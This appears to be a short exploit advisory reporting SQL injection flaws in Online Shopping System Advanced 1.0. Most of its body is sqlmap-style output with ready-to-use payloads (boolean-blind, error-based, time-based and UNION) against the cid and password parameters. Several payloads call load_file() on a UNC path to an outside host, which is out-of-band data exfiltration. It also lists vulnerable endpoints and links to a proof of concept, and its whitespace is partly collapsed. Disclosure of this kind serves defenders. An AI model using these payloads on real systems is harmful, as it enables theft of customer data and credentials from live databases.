Online Shopping System Advanced 1.0 SQL Injection

The online-shopping-system-advanced-1.0 suffers from multiple SQLiThe attacker can steal all information from the database of this system.Status: CRITICAL[+] Exploit:```MYSQLParameter: cid (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''OR NOT 4084=4084 AND 'icSi'='icSi    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT(ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#```--------------------------------------------------------------------------------------------```MYSQLParameter: password (POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: [email protected]&password=e2H!l7r!I2' AND (SELECT7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT(ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: [email protected]&password=e2H!l7r!I2' AND (SELECT7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on````--------------------------------------------------------------------------------------------```MYSQL```## And more:```txt[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cidparameter]][1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cidparameter]][1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php[password parameter]][1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [pparameter]][1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [pparameter]][1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php[email parameter]][1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [nameparameter]]```PoC:https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>